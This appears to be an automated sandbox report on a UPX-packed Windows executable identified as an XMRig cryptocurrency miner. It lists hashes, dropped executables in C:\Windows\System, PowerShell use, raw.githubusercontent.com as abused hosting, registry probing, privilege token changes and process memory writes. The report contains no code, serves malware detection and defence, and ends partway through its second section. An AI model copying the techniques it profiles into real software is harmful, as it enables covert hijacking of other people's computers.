Malware Analysis Report

2024-11-16 11:40

Sample ID 240612-h8wj6sthkf
Target 27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe
SHA256 dd544791357c65a69ea305c5eb7accee01b88c69708742ff53434e53675d20a6
Tags
xmrig execution miner upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dd544791357c65a69ea305c5eb7accee01b88c69708742ff53434e53675d20a6

Threat Level: Known bad

The file 27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner upx

Xmrig family

xmrig

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

UPX packed file

Loads dropped DLL

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Checks processor information in registry

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-12 07:24

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 07:24

Reported

2024-06-12 07:27

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\LUAXcRm.exe N/A
N/A N/A C:\Windows\System\QtGrMoj.exe N/A
N/A N/A C:\Windows\System\mbUlHsm.exe N/A
N/A N/A C:\Windows\System\AzGRyMj.exe N/A
N/A N/A C:\Windows\System\WtDYSuY.exe N/A
N/A N/A C:\Windows\System\HxbAazS.exe N/A
N/A N/A C:\Windows\System\RHanOlc.exe N/A
N/A N/A C:\Windows\System\UxUdIos.exe N/A
N/A N/A C:\Windows\System\datiduA.exe N/A
N/A N/A C:\Windows\System\VNqvexl.exe N/A
N/A N/A C:\Windows\System\TyJwUgx.exe N/A
N/A N/A C:\Windows\System\AzOQmgs.exe N/A
N/A N/A C:\Windows\System\TJfFtMj.exe N/A
N/A N/A C:\Windows\System\cpNYghl.exe N/A
N/A N/A C:\Windows\System\SYjvtPG.exe N/A
N/A N/A C:\Windows\System\FlVLSxL.exe N/A
N/A N/A C:\Windows\System\XobMwfm.exe N/A
N/A N/A C:\Windows\System\knsVvIu.exe N/A
N/A N/A C:\Windows\System\lgTwpcz.exe N/A
N/A N/A C:\Windows\System\ClhmUqz.exe N/A
N/A N/A C:\Windows\System\VABdwRq.exe N/A
N/A N/A C:\Windows\System\vcFJdUl.exe N/A
N/A N/A C:\Windows\System\vpMMLHE.exe N/A
N/A N/A C:\Windows\System\QpTWwwq.exe N/A
N/A N/A C:\Windows\System\Nprthpy.exe N/A
N/A N/A C:\Windows\System\piYVlmM.exe N/A
N/A N/A C:\Windows\System\gXVGHRh.exe N/A
N/A N/A C:\Windows\System\TgwGrDZ.exe N/A
N/A N/A C:\Windows\System\hjYTENp.exe N/A
N/A N/A C:\Windows\System\oTwHqia.exe N/A
N/A N/A C:\Windows\System\iSurYzs.exe N/A
N/A N/A C:\Windows\System\wxaSHlM.exe N/A
N/A N/A C:\Windows\System\Xrmhxyc.exe N/A
N/A N/A C:\Windows\System\VsPNFKy.exe N/A
N/A N/A C:\Windows\System\XXmpKFE.exe N/A
N/A N/A C:\Windows\System\rLvaKqj.exe N/A
N/A N/A C:\Windows\System\vJCaAFG.exe N/A
N/A N/A C:\Windows\System\vFWAEqY.exe N/A
N/A N/A C:\Windows\System\qKTUGfh.exe N/A
N/A N/A C:\Windows\System\XfWthaf.exe N/A
N/A N/A C:\Windows\System\uqRtqjc.exe N/A
N/A N/A C:\Windows\System\aZoorGw.exe N/A
N/A N/A C:\Windows\System\aLtFGUb.exe N/A
N/A N/A C:\Windows\System\inbnQcy.exe N/A
N/A N/A C:\Windows\System\pHTpoGc.exe N/A
N/A N/A C:\Windows\System\BgqktBJ.exe N/A
N/A N/A C:\Windows\System\WlBAjHP.exe N/A
N/A N/A C:\Windows\System\MAfBHCv.exe N/A
N/A N/A C:\Windows\System\EhNEHug.exe N/A
N/A N/A C:\Windows\System\GhMLHhA.exe N/A
N/A N/A C:\Windows\System\NAFaJyo.exe N/A
N/A N/A C:\Windows\System\yAQGjZX.exe N/A
N/A N/A C:\Windows\System\KVbtNZr.exe N/A
N/A N/A C:\Windows\System\QLxbZJT.exe N/A
N/A N/A C:\Windows\System\dBbBZuE.exe N/A
N/A N/A C:\Windows\System\NSCzAwV.exe N/A
N/A N/A C:\Windows\System\ekueOOg.exe N/A
N/A N/A C:\Windows\System\NpwjHvs.exe N/A
N/A N/A C:\Windows\System\sXMXTsE.exe N/A
N/A N/A C:\Windows\System\lPbkaxK.exe N/A
N/A N/A C:\Windows\System\MHgHPTZ.exe N/A
N/A N/A C:\Windows\System\KPODZYe.exe N/A
N/A N/A C:\Windows\System\fuMqsDo.exe N/A
N/A N/A C:\Windows\System\IYIeqqr.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\MycTsNm.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\WRnYtUE.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\aRXJNNm.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\UOjdOFt.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\TqNizRs.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\bqPedcZ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\XDYrlNr.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\LwNTnnD.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ybhXrmi.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\YpolJAe.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\BpxIzKl.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\oQgntFa.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\CxcjTny.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\hmvnYNB.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\zKhRiAq.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\DpuwWzy.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\CPMpTNQ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ggxvdgg.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\YpKDEvc.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\BgyZtMN.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\WbTryRv.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\nOjPDeT.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\zeIqNdm.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\iiauVwL.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\SbdgePT.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\WCSBxEV.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\tvTMrEJ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\tAcqGml.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\toHoHnp.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\CQOQkXc.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\lUNxyyG.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\FbDrwLI.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\QmKXFGw.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\eMqdawm.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\cOniulp.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\NNkSFKr.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\kmKNyml.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\MOhwoUN.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\hRuEour.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\zDYsXVM.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\gSfBzcC.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\uCIWltp.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\GzFxjyC.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\UxaXSma.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\BIwcZMW.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\HMgtGHo.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\alrKehQ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\LUAXcRm.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\OHwdVaw.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\DRUgKdz.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\nxUjNWl.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\kQpMgSG.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\KQYaXwe.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\RxDLWQM.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZXSrjDM.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\szWQywX.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\NJOMsHg.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\itZCEDQ.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\YQSeOQr.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\zoZuDoP.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\qDszPjq.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\jpdBIDA.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\bCFdfJl.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
File created C:\Windows\System\iMyKtXw.exe C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 232 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 232 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\LUAXcRm.exe
PID 232 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\LUAXcRm.exe
PID 232 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\QtGrMoj.exe
PID 232 wrote to memory of 2952 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\QtGrMoj.exe
PID 232 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\mbUlHsm.exe
PID 232 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\mbUlHsm.exe
PID 232 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\AzGRyMj.exe
PID 232 wrote to memory of 556 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\AzGRyMj.exe
PID 232 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\WtDYSuY.exe
PID 232 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\WtDYSuY.exe
PID 232 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\HxbAazS.exe
PID 232 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\HxbAazS.exe
PID 232 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\RHanOlc.exe
PID 232 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\RHanOlc.exe
PID 232 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\UxUdIos.exe
PID 232 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\UxUdIos.exe
PID 232 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\datiduA.exe
PID 232 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\datiduA.exe
PID 232 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\VNqvexl.exe
PID 232 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\VNqvexl.exe
PID 232 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\TyJwUgx.exe
PID 232 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\27b8b0045219cf8dcacb21c35ad3b620_NeikiAnalytics.exe C:\Windows\System\TyJwUgx.exe
